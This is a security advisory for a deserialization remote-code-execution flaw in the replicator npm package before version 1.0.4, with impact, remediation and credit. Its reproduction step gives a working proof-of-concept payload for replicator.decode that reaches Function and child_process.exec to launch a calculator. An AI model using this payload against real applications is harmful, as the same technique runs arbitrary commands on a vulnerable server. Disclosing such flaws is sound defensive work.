Summary

Affected versions of replicator npm package are vulnerable to a deserialization RCE via the TypedArrays objects. replicator doesn’t verify the object type given when deserializing TypedArrays and thus letting an attacker create arbitrary objects.

Product

replicator before 1.0.4.

Impact

In case an untrusted data get deserialized, an attacker could achieve RCE.

Steps to reproduce

1
replicator.decode('[{"@t":"[[TypedArray]]","data":{"ctorName":"setTimeout","arr":​{"@t":"[[TypedArray]]","data":{"ctorName":"Function","arr":"process.mainModule.require(\'child_process\').exec(\'calc\');"}}​}}]')

Expected result:

The command in the exec function will be run, in this case aimed for a Windows machine a calculator will pop up.

Remediation

Update replicator dependency to 1.0.4 or above.

Credit

This issue was discovered and reported by Checkmarx SCA Security Researcher Yaniv Nizry.

Resources

  1. Pull request
  2. Issue
  3. Commit
  4. Blog